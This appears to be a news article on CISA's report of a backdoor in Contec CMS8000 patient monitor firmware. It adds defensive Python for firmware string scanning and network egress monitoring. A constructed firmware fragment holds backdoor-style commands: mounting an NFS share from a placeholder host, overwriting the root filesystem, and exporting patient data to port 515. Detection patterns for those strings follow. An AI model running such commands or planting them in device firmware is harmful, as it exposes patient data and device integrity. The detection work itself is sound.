Malware Found in Healthcare Patient Monitors Linked to Chinese IP Address


CISA has found hidden backdoor functionality in the firmware of Contec CMS8000 patient monitors that puts both patient safety and patient data at risk.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) reported that the device firmware contains a backdoor that communicates with a hard-coded IP address; CISA says the address belongs to a third-party university, which has been identified as a university in China.

The Contec CMS8000, a patient monitor widely used in hospitals and other healthcare facilities, was found to have three vulnerabilities, which CISA analysts describe as follows:

  1. Out-of-Bounds Write (CWE-787):
  • A remote attacker can trigger the flaw by sending specially crafted UDP requests to the device, leading to remote code execution.
  • Tracked as CVE-2024-12248 with a CVSS v4 score of 9.3 (critical).
  2. Hidden Backdoor Functionality (CWE-912):
  • The firmware contains undocumented code that sends patient data to a hard-coded IP address and lets that remote host push files onto the device.
  • On startup the backdoor runs ifconfig eth0 up to bring up the network interface, mounts an NFS share from the hard-coded IP at /mnt/, and copies files from that share over the device's own filesystem, with no integrity check and no log entry.
  • Tracked as CVE-2025-0626 with a CVSS v4 score of 7.7.
  3. Privacy Leakage (CWE-359):
  • Patient data, including names, patient IDs and medical details, is sent in plain text to the hard-coded IP over port 515 (the LPD printer port) once the device has network connectivity.
  • Tracked as CVE-2025-0683 with a CVSS v4 score of 8.2.
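The strings CISA describes (the ifconfig call, the NFS mount at /mnt/, the use of port 515 and a literal IP address) are exactly what a firmware reviewer would grep an extracted image for. The Python below is an added example, not CISA's, the FDA's or Contec's tooling: it scans a constructed firmware fragment for those indicators and separates any embedded IPv4 literals into expected local addresses and foreign ones. The 10.50.0.0/16 hospital range and the 203.0.113.45 address are placeholders, not the real hard-coded address from the fact sheet.

```python
"""Static triage of a firmware image for the CMS8000 backdoor indicators.

Added example, not CISA's, the FDA's or Contec's tooling. FIRMWARE is a
constructed stand-in for an extracted binary or rootfs; the IP addresses in
it are placeholders (TEST-NET-3 and an assumed hospital range), not the real
hard-coded address from CISA's fact sheet.
"""
import ipaddress
import re

# Networks the device is expected to talk to (assumed hospital addressing).
LOCAL_NETS = [ipaddress.ip_network("10.50.0.0/16")]

# Indicators taken from the advisory text: eth0 brought up, an NFS share mounted
# at /mnt/, and patient data sent to port 515.
INDICATOR_PATTERNS = {
    "ifconfig_eth0_up": re.compile(rb"ifconfig\s+eth0\s+up"),
    "nfs_mount_to_mnt": re.compile(rb"mount\s+(?:-t\s+nfs\s+)?\S+:\S+\s+/mnt/?"),
    "port_515": re.compile(rb"\b515\b"),
}
IPV4_RE = re.compile(
    rb"(?<![\d.])(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)(?![\d.])"
)

# Constructed firmware fragment: an ELF header followed by the kind of strings
# the backdoor would embed.
FIRMWARE = (
    b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 16
    + b"/sbin/ifconfig eth0 up\x00"
    + b"mount -t nfs 203.0.113.45:/cms8000 /mnt/\x00"
    + b"cp -rf /mnt/* /\x00"
    + b"patient_export 203.0.113.45 515\x00"
    + b"ntp 10.50.1.1\x00"
)


def find_indicators(blob):
    """Map indicator name -> list of (offset, matched string) for every hit."""
    hits = {}
    for name, pattern in INDICATOR_PATTERNS.items():
        matches = [(m.start(), m.group().decode("ascii", "replace"))
                   for m in pattern.finditer(blob)]
        if matches:
            hits[name] = matches
    return hits


def extract_ipv4(blob):
    """Every IPv4 literal in the blob, split by whether it is in LOCAL_NETS."""
    local, foreign = set(), set()
    for m in IPV4_RE.finditer(blob):
        ip = ipaddress.ip_address(m.group().decode("ascii"))
        (local if any(ip in net for net in LOCAL_NETS) else foreign).add(str(ip))
    return sorted(local), sorted(foreign)


def triage(blob):
    """Summarise the evidence a reviewer would want before escalating."""
    indicators = find_indicators(blob)
    local_ips, foreign_ips = extract_ipv4(blob)
    return {
        "indicators": sorted(indicators),
        "local_ips": local_ips,
        "foreign_ips": foreign_ips,
        # A mount indicator plus a hard-coded non-local IP is the combination CISA described.
        "backdoor_pattern": "nfs_mount_to_mnt" in indicators and bool(foreign_ips),
    }


if __name__ == "__main__":
    for key, value in triage(FIRMWARE).items():
        print(f"{key}: {value}")
```

On a real image, run this over the output of a firmware extractor (each file of the root filesystem, or the raw binary) rather than a single blob, and treat the foreign-IP list as the starting point for the egress blocks described in the mitigation section; string matching finds what was compiled in as plain text, so an absence of hits does not prove an absence of the backdoor.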

Impact

Together these flaws let an attacker execute arbitrary code on the monitor, exfiltrate patient information, and overwrite device files and configuration, which could change how the device behaves, including the vital-sign readings clinicians rely on.

CISA confirmed the behaviour by reverse engineering the firmware and by observing the device's network traffic in a test environment, which showed connections to the hard-coded IP address. The backdoor writes nothing to the device's logs, so the activity leaves no trace on the monitor itself and is hard to detect without looking at the network.

CISA notified Contec Health, and the firmware updates Contec supplied in response still contained the backdoor; no fix that removes it is currently available. Hospitals are advised to watch these devices closely for signs of tampering or abnormal behaviour, in particular unexpected outbound connections.

CISA has not attributed the backdoor to any particular actor; its fact sheet says only that the hard-coded IP address belongs to a third-party university rather than to a medical device manufacturer or healthcare facility. Whoever controls that address, the design means that anyone able to answer as it on the device's network path can push files onto the monitor. With healthcare increasingly reliant on interconnected devices, robust cybersecurity measures are more critical than ever.

CISA and the FDA recommend that healthcare organisations act now: disconnect the monitors from the internet and, where remote monitoring is not needed, from the network entirely; block the hard-coded IP address at the firewall and restrict what the devices can reach; and place medical devices on their own isolated subnet.

Firmware updates should be applied once Contec releases a version that CISA has confirmed removes the backdoor; the updates released so far do not, so patching alone is not a mitigation today.
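The monitoring and blocking advice above can be turned into concrete checks. The Python below is an added example, not CISA's, the FDA's or Contec's guidance as code: it runs over Zeek-style conn.log lines (constructed here) and flags any flow from the monitor VLAN to the placeholder backdoor address, or to a non-allowlisted host on port 515 (LPD) or the rpcbind/NFS ports (111, 2049) the remote mount needs, and it emits nftables commands for a default-deny egress policy on that VLAN. The 10.50.0.0/24 device subnet, the 10.50.1.0/24 central-station range and the 203.0.113.45 address are assumptions, not values from the advisory.

```python
"""Egress monitoring and blocking for a patient-monitor VLAN.

Added example, not CISA's, the FDA's or Contec's guidance as code. It assumes
Zeek-style conn.log lines, monitors on 10.50.0.0/24, a central station on
10.50.1.0/24 and a placeholder backdoor address 203.0.113.45 (TEST-NET-3),
none of which come from the advisory.
"""
import ipaddress

DEVICE_SUBNET = ipaddress.ip_network("10.50.0.0/24")    # assumed medical-device VLAN
ALLOWED_DESTS = [ipaddress.ip_network("10.50.1.0/24")]  # assumed central station / local servers
HARD_CODED_IP = ipaddress.ip_address("203.0.113.45")    # placeholder, not the real address

# 515/tcp is LPD, the port the monitor uses to push patient data; 111 and 2049 are
# rpcbind and NFS, which the backdoor needs to mount the remote share.
SUSPECT_PORTS = {515: "LPD patient-data export", 111: "rpcbind (NFS mount)", 2049: "NFS"}

# Constructed sample log. Field order follows Zeek conn.log:
# ts, uid, id.orig_h, id.orig_p, id.resp_h, id.resp_p, proto, service
SAMPLE_LOG = """\
1738252800.10\tC1\t10.50.0.12\t49152\t10.50.1.5\t515\ttcp\t-
1738252801.22\tC2\t10.50.0.12\t49153\t203.0.113.45\t515\ttcp\t-
1738252802.00\tC3\t10.50.0.12\t874\t203.0.113.45\t2049\ttcp\t-
1738252803.50\tC4\t10.50.0.12\t49154\t198.51.100.7\t111\tudp\t-
1738252804.00\tC5\t10.50.0.13\t49155\t10.50.1.5\t443\ttcp\tssl
1738252805.00\tC6\t192.168.9.9\t51000\t203.0.113.45\t515\ttcp\t-
"""


def parse_conn_line(line):
    ts, uid, oh, op, rh, rp, proto, service = line.rstrip("\n").split("\t")
    return {"ts": float(ts), "uid": uid,
            "orig_h": ipaddress.ip_address(oh), "orig_p": int(op),
            "resp_h": ipaddress.ip_address(rh), "resp_p": int(rp),
            "proto": proto, "service": service}


def is_allowed_dest(ip):
    return any(ip in net for net in ALLOWED_DESTS)


def classify(flow):
    """Reason string if the flow matches the backdoor pattern, else None."""
    if flow["orig_h"] not in DEVICE_SUBNET:
        return None  # only the monitor VLAN is in scope for this rule
    if flow["resp_h"] == HARD_CODED_IP:
        return "contact with hard-coded backdoor IP"
    if flow["resp_p"] in SUSPECT_PORTS and not is_allowed_dest(flow["resp_h"]):
        return f"{SUSPECT_PORTS[flow['resp_p']]} to non-allowlisted host"
    return None


def find_suspicious(log_text):
    """(uid, src, dst, dst_port, reason) for every suspicious flow in the log."""
    hits = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        flow = parse_conn_line(line)
        reason = classify(flow)
        if reason:
            hits.append((flow["uid"], str(flow["orig_h"]), str(flow["resp_h"]),
                         flow["resp_p"], reason))
    return hits


def nft_egress_rules():
    """nftables commands for a default-deny egress policy on the monitor VLAN."""
    rules = [f'nft add rule inet filter forward ip saddr {DEVICE_SUBNET} '
             f'ip daddr {HARD_CODED_IP} counter log prefix "cms8000-backdoor " drop']
    for net in ALLOWED_DESTS:
        rules.append(f"nft add rule inet filter forward ip saddr {DEVICE_SUBNET} "
                     f"ip daddr {net} accept")
    rules.append(f"nft add rule inet filter forward ip saddr {DEVICE_SUBNET} counter drop")
    return rules


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit)
    print("\n".join(nft_egress_rules()))
```

The log check flags the two flows to the placeholder address and the rpcbind lookup to an unknown host, but not the LPD export to the central station or traffic that does not originate on the monitor VLAN. The nftables commands assume an existing inet filter table with a forward chain on the gateway between the device VLAN and everything else; the explicit counter and log on the backdoor address give you an alert and a count even though the final default-deny rule would drop it anyway.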
